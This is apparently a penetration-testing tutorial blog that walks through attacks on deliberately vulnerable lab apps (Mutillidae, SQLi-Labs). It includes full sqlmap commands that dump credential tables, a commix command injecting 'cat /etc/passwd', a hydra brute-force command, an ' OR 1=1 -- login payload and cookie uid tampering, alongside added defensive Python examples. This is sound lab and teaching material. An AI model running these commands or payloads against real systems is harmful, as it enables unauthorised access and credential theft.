Tuesday, 19 January 2016

New version of mutillidae released

A new version of mutillidae has been released; the current version is 2.6.34. Don't forget to download the md5 checksum for the zip file and then verify the integrity of the download (note the two spaces between the checksum and the filename, which is the format md5sum -c expects, and the quotes that preserve them):

echo "1ebe063a0b258093b5df45e81fe8954e  LATEST-mutillidae-2.6.34.zip" | md5sum -c

Available from SourceForge.

Update: I've sent Jeremy Druin aka webpwnized a message stating that after install etc. the version shows as 2.6.32; not sure if the error is in the upload or directly in the web app itself.

Awaiting response.

Update: according to webpwnized this will be fixed in a coming update; for now I can edit the /includes/constants.php file myself and correct it.

Wednesday, 13 January 2016

Sqli-labs Object: GET - Error based - Single quotes - String lesson 1

Practice SQL injection hacking skills using this vulnerable SQL framework.

browser: iceweasel
os: kali linux
Web App: SQLi-Labs

SQLi-LABS can be downloaded from

https://github.com/Audi-1/sqli-labs

There are several lessons and I will iterate through them all, starting with Less-1.

lesson: number 1
Object: GET - Error based - Single quotes - String

This is simple stuff: simply visit

http://192.168.0.9/sqli-labs/Less-1/

We are met with an info message:

Please input the ID as parameter with numeric value

We can satisfy this by simply appending the following to the URL:

?id=1

so our full URL will now look like

http://192.168.0.9/sqli-labs/Less-1/?id=1


A user's username & password are returned to the screen; changing ?id=1 to, for example, ?id=2 will display different credentials.

To get a simple error message produced on the screen, simply append ' (a single quote) to the URL, which returns the following error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

This bears all the hallmarks of a SQL injection vulnerability, so let's fire up sqlmap:

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" --dbs

This gives us the names of the databases.

If you're not sure which database to look in you'll have to poke around and see; our target is the security database. Next we want to have a look at the available tables, so our next command is:

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security --tables

 



Now then, the users table looks interesting; let's go ahead and see what's inside. We have the database name and the table name, now we need to see what's in the columns. Here's the new command:

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users --columns

Awesome, the columns contain ids, passwords and usernames; we want to see all of that. Here's the final command:

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users -C id,password,username --dump


We have successfully exploited the SQL injection vulnerability to retrieve all ids, usernames and passwords from the MySQL database.

Remember, in the previous post sqlmap-database-takeover-tool-old-skool we had to use the --data="" switch; this was because the method was POST. In this example the method is GET, therefore there was no need to use --data="".
 

SQLMAP Database Hacking - An Easier Way

Using sqlmap in conjunction with burpsuite (easy)

tools: sqlmap, burpsuite
OS: kali linux

Previously in this blog we passed some parameters to sqlmap by hand to aid in our attack; there is a faster method of passing the data to sqlmap from burpsuite, and it's easy.

Navigate to

  • http://192.168.0.9/mutillidae/index.php?page=login.php

which is the login page we wish to bypass, then:

  • attempt to login using ANY username & ANY password
  • capture the POST request using burpsuite
  • right click on the request
  • select save item (then save to your chosen location)

Now we can run the sqlmap command easily without passing all the parameters to it; we simply run

sqlmap -r "PATH_TO_SAVED_REQUEST"


I saved the request as sqlmap-practice

This makes it much easier to pass data to sqlmap; however, to fully exploit the database, i.e. hack the accounts, we still need to find out the following:

  • database name
  • database tables
  • database columns

This can only be done (as far as I'm aware) via experience and/or trial and error.

I've utilized this easier method to successfully attack and own all OWASP A1 (SQL Injection) lessons in mutillidae.

SQLMAP - Database takeover tool - the old skool way

Hacking a MySQL database via SQLMAP

Here I will demonstrate a SQL injection attack using SQLMAP; I will use this hack to bypass a login.

Tools: SQLMAP/Burpsuite
Browser: Iceweasel
Web App: Mutillidae v2.6.30
OS: Kali Linux

First:
  • configure browser and proxy (I'm using burpsuite) then head to
  • http://192.168.0.9/mutillidae/index.php?page=login.php
  • enter some data in the username & password fields
  • in burp, review the data from the POST capture; we need some info from it


So using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is a combination of the Host header and the path on the POST request line, as shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

Next part of the command:
--data="ENTER_DATA_HERE" (this is the body of the POST request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

and finally
--banner (retrieves the database banner)

The sqlmap command is now complete. Our full sqlmap command is:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection)(**banner**) 
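What sqlmap -r reads out of a saved request, as an added Python example (not from the original post and not sqlmap's own code): it pulls the same three pieces this post assembles by hand, the URL from the Host header plus the request line, the POST body for --data, and the Cookie header, out of raw request text. The request below is constructed (the body is the one shown above, the session id is a placeholder), and the parser assumes the saved file holds the raw request and that the lab is plain http.

```python
from urllib.parse import parse_qsl

# Constructed raw request in the shape Burp shows for the login POST above.
SAVED_REQUEST = """\
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.0.9
User-Agent: Mozilla/5.0 (constructed)
Content-Type: application/x-www-form-urlencoded
Cookie: showhints=1; PHPSESSID=CONSTRUCTED_SESSION_ID
Content-Length: 65

username=username&password=password&login-php-submit-button=Login
"""

def parse_raw_request(text: str) -> dict:
    """Split a raw HTTP request into method, full URL, body and cookie."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    method, path = parts[0], parts[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if not host:
        raise ValueError("request has no Host header, cannot build the URL")
    return {
        "method": method,
        "url": f"http://{host}{path}",          # scheme assumed: the lab is served over http
        "data": body.strip() if method == "POST" else "",
        "cookie": headers.get("cookie", ""),
    }

def form_fields(data: str) -> dict:
    """Decode the urlencoded body into the individual form fields."""
    return dict(parse_qsl(data, keep_blank_values=True))

def sqlmap_argv(req: dict) -> list:
    """The command this post builds by hand; --data is dropped for a GET request,
    which is the difference the sqli-labs post points out."""
    argv = ["sqlmap", f"--url={req['url']}"]
    if req["data"]:
        argv.append(f"--data={req['data']}")
    if req["cookie"]:
        argv.append(f"--cookie={req['cookie']}")
    return argv
```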


BYPASSING A LOGIN USING SQLMAP 


So we are 100% certain that the MySQL database is vulnerable to SQL injection; now we will escalate our attack and see what credentials we can grab.

We need to bypass the login presented to us on the login page. We know the application is vulnerable to SQL injection, so we will mount an attack to verify this. We already have the main command for the attack:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

We simply need to amend the command slightly. The first new command/switch/parameter we enter is

--dbs (this lists the available databases)

There were 6 options.

From experience I know that the database we need to attack is named nowasp, so now we can further amend our sqlmap command:

  • remove --dbs (as we now know the name of the database that we need to hack)
  • add -D nowasp
  • add --tables (the tables switch will list all tables within the database nowasp)

Again, experience tells me I want to retrieve the info held within the accounts table, so we can now further amend our command:

  • remove --tables
  • add -T accounts
  • add --columns (gives us a list of columns to select info from)

Bingo, we now have a full list of all the columns of info we want to retrieve; in this case I want

  • firstname
  • lastname
  • password
  • username

We are now ready to complete our sqlmap command and hack, so we:

  • remove --columns
  • add -C firstname,lastname,password,username
  • add --dump so that all the credentials retrieved are dumped to the screen

Our full sqlmap injection command is:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

We have successfully retrieved all usernames & passwords for the login to the system, thereby bypassing any need for our own login.
Monday, 11 January 2016

Verify checksum of files on linux


When downloading files, especially from the Internet, it's crucial that you verify your download; this will help you realise if the file you have just downloaded has been tampered with in any way by another party.

In this example we have just downloaded WebGoat from the interweb; the filename and checksum are displayed in the pic below.


filename: WebGoat-5.4-OWASP_Standard_Win32.zip
SHA1 Checksum: eb61e9eadb00ae62796110bedf16366a8a15c02f

To verify this in Linux (Kali) is simple; simply enter the command as shown below (note the two spaces between the checksum and the filename, which is the format sha1sum -c expects, and the quotes that preserve them):

echo "eb61e9eadb00ae62796110bedf16366a8a15c02f  WebGoat-5.4-OWASP_Standard_Win32.zip" | sha1sum -c -


sha1sum checksum    







If the sha1sum matches the file, the output returned is WebGoat-5.4-OWASP_Standard_Win32.zip: OK; however, if there was a mismatch you will see WebGoat-5.4-OWASP_Standard_Win32.zip: FAILED.
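The same check in Python, added here as an example that is not from the original post: it reads a "checksum  filename" line the way sha1sum -c and md5sum -c do (so it also covers the md5sum check in the mutillidae 2.6.34 post above), hashes the file in chunks and reports OK, FAILED, or an open/read failure. The file, its contents and the demo() scenario are constructed; the WebGoat digest from the page is not reproduced.

```python
import hashlib
import hmac
import os
import tempfile

def file_digest(path, algo="sha1", chunk_size=1 << 20):
    """Hash a file in chunks so a large download (a zip archive) need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()

def check_line(line, algo="sha1", base_dir="."):
    """Verify one 'HEX  FILENAME' line as sha1sum -c / md5sum -c read it.

    Returns (filename, status); status mirrors the coreutils wording:
    "OK", "FAILED", "FAILED open or read" or "improperly formatted".
    """
    expected, _, name = line.strip().partition(" ")
    name = name.lstrip(" *")   # second space, or '*' for binary mode
    if not expected or not name:
        return name, "improperly formatted"
    try:
        actual = file_digest(os.path.join(base_dir, name), algo)
    except OSError:
        return name, "FAILED open or read"
    ok = hmac.compare_digest(actual.lower().encode(), expected.lower().encode())
    return name, "OK" if ok else "FAILED"

def demo():
    """Constructed scenario: a fake archive containing b'hello', checked against known digests,
    then modified to show what a tampered download looks like."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        name = "constructed-download.zip"
        with open(os.path.join(d, name), "wb") as f:
            f.write(b"hello")
        # sha1("hello") and md5("hello") are well-known test vectors.
        good_sha1 = "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d"
        good_md5 = "5d41402abc4b2a76b9719d911017c592"
        results["sha1_ok"] = check_line(f"{good_sha1}  {name}", "sha1", d)
        results["md5_ok"] = check_line(f"{good_md5}  {name}", "md5", d)
        # The bytes change but the published digest does not: this is the mismatch case.
        with open(os.path.join(d, name), "ab") as f:
            f.write(b"!")
        results["tampered"] = check_line(f"{good_sha1}  {name}", "sha1", d)
        results["missing"] = check_line(f"{good_sha1}  not-downloaded.zip", "sha1", d)
    return results
```

A digest published next to the download only catches corruption or an accidentally swapped file: MD5 and SHA-1 collisions are practical, and someone who controls the download page can change the digest along with the file, so tamper-proofing needs a signature from the publisher rather than a hash from the same page.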




 

OWASP A1 - Injection - Other Commix OS command injection tool

OWASP A1 INJECTION OTHER

tools: commix, burpsuite, iceweasel

Vulnerable app: Mutillidae V2.6.30

I came across this tool recently, commix (Command Injection eXploiter), so I thought I'd best put it to the test; here's what I did:

commix --url="http://192.168.0.9/mutillidae/index.php?page=dns-lookup.php" --data="target_host=INJECT_HERE&dns-lookup-php-submit-button=Lookup+DNS" --cookie "showhints=1; PHPSESSID=bf0t3nlg0f67u34f36gvaug5r7" --os-cmd="cat /etc/passwd" 

So let's look at where we got these parameters from in detail.

--url="http://192.168.0.9/mutillidae/index.php?page=dns-lookup.php"

--url="" is the parameter for entering a URL; between the quotes is the ACTUAL URL of the web page we want to test command injection on, in this case the DNS lookup page of mutillidae.

--data="target_host=INJECT_HERE&dns-lookup-php-submit-button=Lookup+DNS"

--data="" is the parameter for entering data; in this case it is the POST data of the request produced when submitting the page, and we insert the actual data BETWEEN the double quotes. To get the actual data follow these steps:
  • on the DNS lookup page enter an IP or hostname and click Lookup DNS
  • in burp suite highlight the bottom line and replace www.google.com with INJECT_HERE
  • then copy & paste the entire line BETWEEN the double quotes

--cookie="" is the parameter where the cookie goes.

Copy the cookie as shown above from burpsuite (or an add-on like Tamper Data) and paste it directly between the double quotes.

Finally we use --os-cmd="cat /etc/passwd"
--os-cmd="" allows a single OS command to be executed.
cat /etc/passwd is the command we have injected and gives us a list of users on the system.

The output is printed to screen as shown below.

A video of the full attack is shown below.

A more (visually improved) method of getting the output of cat /etc/passwd is via commix's built-in enumeration, by using the switch

--users

Watch the video below to see commix in action enumerating users.
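The defence side of the same DNS lookup form, as an added Python example (not Mutillidae's PHP and not part of the original post): the vulnerable pattern splices target_host into a shell string, while the hardened version validates the value as a hostname or IP literal and hands it to the resolver as one argv element with no shell involved, so a ; in the input is just data. The function names and the hostname regex are constructed for this example.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits and hyphens, not starting or ending with a hyphen (RFC 1123 shape).
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{LABEL}(?:\.{LABEL})*\.?$")

def is_valid_target(target_host: str) -> bool:
    """Allow only a hostname or an IP literal. Shell metacharacters (; | $ ` and so on) and
    option-looking values such as -h can never pass, so nothing downstream has to escape them."""
    if not target_host or len(target_host) > 253:
        return False
    try:
        ipaddress.ip_address(target_host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(target_host) is not None

def vulnerable_command(target_host: str) -> str:
    """The pattern commix exploits on the lookup page: raw form input spliced into a shell
    command line. Constructed stand-in, not Mutillidae's code."""
    return "nslookup " + target_host

def safe_argv(target_host: str) -> list:
    """Validate, then pass the value as a single argv element; there is no shell to parse it."""
    if not is_valid_target(target_host):
        raise ValueError("target_host must be a hostname or IP address")
    return ["nslookup", target_host]

def run_lookup(target_host: str, timeout: float = 10) -> str:
    """Run the lookup with shell=False: a ; in the input stays inside the argument instead of
    separating commands. Not called in the test, since it needs a resolver on the box."""
    proc = subprocess.run(safe_argv(target_host), capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.stdout
```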






Friday, 8 January 2016

Enumerating usernames


Tools used;
browser:iceweasel
web app: Mutillidae

This simply lets us know if a username has already been used. To achieve this, simply attempt to log in with usernames; it doesn't matter if you don't know the password, as we are simply enumerating usernames so we can later launch a brute force attack.

First we use one test username, with no idea whether this username has been used already (I used the name jess); the result was

therefore there is no username of jess registered on the system.

Secondly I used a common username, admin; the result is

This clearly demonstrates that although the password we supplied was incorrect there is definitely a username called admin. We can now attempt to brute force the admin username using hydra or burpsuite (Intruder).

mutillidae brute force login

Brute Force Web Login using Hydra

OS used: Kali Linux
Tool Used: hydra/ burp suite
web app: mutillidae



Here is the command used in full:
hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9  http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


Let's break it down:

hydra > this is the name of the brute force program
-l admin > this tells the program to check the username admin (this was gained via enumeration earlier)
-P /root/Desktop/work/mutillidae/mutilldae-passwords > this is the path to the password file used
192.168.0.9 > this is the host address (IP) of the server
http-post-form > this is the type of form we are attacking
"/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

"/mutillidae/index.php?page=login.php > this is the path to the login page; the " is appended to the beginning

To work out the remainder of the command consider the following:

This was taken from burp suite and is the result of a POST request to the server in an attempt to login; we pass these parameters in part to hydra to complete the command prior to attacking the login page. Hence the command continues with
:username=^USER^&password=^PASS^&login-php-submit-button=Login
but there is still one more piece of info we need, which is
:Not Logged In"
The " is appended to the end. Not Logged In is the text shown when a user is not logged in, i.e. what is presented when you visit the login page without logging in, as shown below; hydra uses this string to recognise a failed attempt.


Remember these parameters will differ depending on the application used. The command

hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

is now complete and we begin our attack.


Brute Force Login Using Burp Suite Intruder


tools: burp suite & iceweasel
web app: mutillidae 

Here I use burp suite intruder to brute force the login of the admin user (remember we enumerated this in an earlier video)

here is the full video of how to brute force a login using burp suite

In short:
  • ensure the proxy is working
  • capture a known bad request
  • right click on the request and send to burp intruder
  • set the payload position
  • load payloads
  • attack

It's worth noting the following findings (in mutillidae):
  • where there is a response code of 302 a successful password has been found
  • the response length differs when compared to unsuccessful logins, for example in the video
successful logins have a length of 48763 (in mutillidae via burp suite)
unsuccessful logins have a length of 48669 (in mutillidae via burp suite)
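Seen from the server's access log, both the hydra attack and the Intruder attack above look the same: a burst of POSTs to page=login.php from one address, each answered with a non-302 status, until a 302 appears. The Python below, added here as an example and not part of the original posts, flags that pattern over constructed combined-log lines; the path, the 200/302 split and the response sizes follow the observations above, while the addresses and timestamps are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/mutillidae/index.php?page=login.php"
# Combined-log style line; only the fields the detector needs are captured.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _size = m.groups()
    return ip, datetime.strptime(ts, TS_FMT), method, path, int(status)

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed login POSTs inside a sliding window.

    Uses the observation above that Mutillidae answers an accepted login with a 302:
    a 302 arriving right after a burst of failures is the case where a guess worked.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent failed attempts
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, status = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        while q and when - q[0] > window:
            q.popleft()
        if status == 302:
            if len(q) >= threshold:
                alerts.setdefault(ip, {"failures": len(q)})["success_after_burst"] = True
            continue
        q.append(when)
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"success_after_burst": False})
            a["failures"] = max(a.get("failures", 0), len(q))
    return alerts

def sample_log():
    """Constructed log: one host hammering the login page, then one ordinary successful login."""
    fmt = '{ip} - - [08/Jan/2016:10:00:{sec:02d} +0000] "POST ' + LOGIN_PATH + ' HTTP/1.1" {status} {size}'
    lines = [fmt.format(ip="192.168.0.20", sec=i, status=200, size=48669) for i in range(15)]
    lines.append(fmt.format(ip="192.168.0.20", sec=20, status=302, size=48763))
    lines.append(fmt.format(ip="192.168.0.7", sec=30, status=302, size=48763))
    return lines
```

The same counting, keyed on the username instead of the source address, catches a slow attack spread over many hosts; either way the server-side answer is lockout or rate limiting on the login endpoint, not a longer password list.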


OWASP A2 Broken Authentication and Session Management


bypass authentication via cookies

Tools: Burp Suite
web app: mutillidae 

To achieve this hack I do the following:

  • set up our proxy
  • register 2 brand new usernames, HelenC & SamF
  • login as HelenC then logout
  • login as SamF then logout
  • next (in burp) under proxy > http history, pick out the 2 requests that authenticated both users (they have a response code of 302 AND the method is POST)
  • right click on the first POST message and select send to comparer (request)
  • right click on the second POST message and select send to comparer (request)

We want to compare the server responses when logging in as both users to see if there is any pattern we can detect; if there is a well defined pattern in the server's responses we might be able to exploit this to gain unauthenticated access to another user's data.

  • next click on the comparer tab and select words

As you can see, burp automatically compares the 2 server responses and highlights any changes. From this we can clearly see that the server first responded to the user HelenC with (amongst other things) the following header:
Set-Cookie: uid=24
For Sam this value has incremented by 1, therefore SamF received the following header:
Set-Cookie: uid=25


This tells me that the server (potentially) increments the value of the Set-Cookie: uid by 1 each time a user registers. Now I will attempt to exploit this behaviour by modifying the value of
Set-Cookie: uid=24
to
Set-Cookie: uid=1

Let's see what happens.

And it worked: we have successfully logged in as the admin simply by changing the value of

Set-Cookie: uid=

in the response from the server.

For this hack to work you must log in with a known good username & password (simply register one yourself).

**Please note there are other parameters that could be tampered with to achieve the same result, but this post is simply about tampering with the

Set-cookie: uid=
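Why the edit works, and what stops it, as an added Python example (not Mutillidae's code and not from the original post): a bare uid cookie is accepted exactly as the browser returns it, while an HMAC over the uid keyed with a server-side secret rejects uid=24 edited to uid=1. SERVER_KEY and the cookie layout are constructed for this example.

```python
import hashlib
import hmac
import re
import secrets

# Constructed server-side key; a real one is generated once and never leaves the server.
SERVER_KEY = secrets.token_bytes(32)

def weak_cookie(uid: int) -> str:
    """What the post observed: the session is nothing but the sequential user id."""
    return f"uid={uid}"

def weak_parse(cookie: str) -> int:
    """The server trusts whatever number comes back, so uid=24 edited to uid=1 becomes user 1."""
    return int(cookie.split("=", 1)[1])

def signed_cookie(uid: int, key: bytes = SERVER_KEY) -> str:
    """Same uid, bound to a MAC the client cannot recompute without the key."""
    tag = hmac.new(key, str(uid).encode(), hashlib.sha256).hexdigest()
    return f"uid={uid}; sig={tag}"

def signed_parse(cookie: str, key: bytes = SERVER_KEY):
    """Return the uid only if the tag matches; an edit to uid or sig yields None."""
    fields = {}
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        fields[name] = value
    uid, sig = fields.get("uid", ""), fields.get("sig", "")
    expected = hmac.new(key, uid.encode(), hashlib.sha256).hexdigest()
    # compare_digest on bytes: constant time, and tolerant of odd characters in sig
    if not uid.isdigit() or not hmac.compare_digest(expected.encode(), sig.encode()):
        return None
    return int(uid)

def tamper(cookie: str, new_uid: int) -> str:
    """Edit the uid value the way the post does in Burp, leaving the rest of the cookie intact."""
    return re.sub(r"uid=\d+", f"uid={new_uid}", cookie, count=1)

def opaque_session_id() -> str:
    """The usual fix: a random identifier with no meaning to the client, mapped to the
    user in server-side session storage, so there is no value worth editing at all."""
    return secrets.token_urlsafe(32)
```

Signing the uid only stops forgery; a signed cookie copied from another user's browser still works until it expires, which is why the opaque, expiring session id is the normal choice.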

OWASP A1 Injection

sqli extract user info low security

web app: mutillidae
browser: iceweasel

In this post we will attempt to extract user data from a database using sql injection


To test for a SQLi vulnerability I simply add a single quote into the Name field. This results in information leakage which aids my attack and also exposes many other vulnerabilities; however, we are solely concerned with obtaining user info. Here's the error message:

This tells me the database is MySQL; it also crucially tells me the ACTUAL SQL query performed. This alone tells me that the parameter/field Name is likely vulnerable to SQL injection, so now we simply need to complete the SQL statement to give us what we want. So we add some more to our single quote: we add

OR 1=1

(1 is ALWAYS equal to 1, therefore we are making the statement true) and

--

(we don't have the password, therefore -- comments out the password check). So now our full SQLi payload is

' OR 1=1 -- <space after the comment>

To achieve this we simply type the SQL payload in the Name field
and as shown in the video all USERNAMES & PASSWORDS have been retrieved
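The vulnerable query beside its parameterised form, as an added Python example (not Mutillidae's PHP and not from the original post), covering both this post's ' OR 1=1 -- payload and the lone quote that produced the syntax error in the sqli-labs Less-1 post. It uses an in-memory SQLite table with constructed rows, so the error wording differs from MySQL's, but the behaviour is the same.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the accounts table; not Mutillidae's schema or data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [
        (1, "admin", "constructed-1"), (2, "adrian", "constructed-2"), (3, "john", "constructed-3")])
    return conn

def lookup_vulnerable(conn, name, password):
    """String-built query: the user's quote closes the literal and the rest of the input is SQL.
    ' OR 1=1 -- makes the WHERE always true and comments out the password check."""
    sql = (f"SELECT id, username, password FROM accounts "
           f"WHERE username = '{name}' AND password = '{password}'")
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name, password):
    """Parameterised query: values travel separately from the SQL text and are never parsed as SQL."""
    sql = "SELECT id, username, password FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()

def probe_error(conn, name, password="x"):
    """What a lone single quote triggers: the database's error text, which the vulnerable app
    echoes to the browser (the information leak the post relies on). None if the query parsed."""
    try:
        lookup_vulnerable(conn, name, password)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

def handle_request(conn, name, password):
    """Hardened handler: parameterised lookup, and a generic error for the client so the query
    text and database type stay in the server log rather than on the page."""
    try:
        return {"rows": lookup_safe(conn, name, password), "error": None}
    except sqlite3.Error:
        return {"rows": [], "error": "lookup failed"}
```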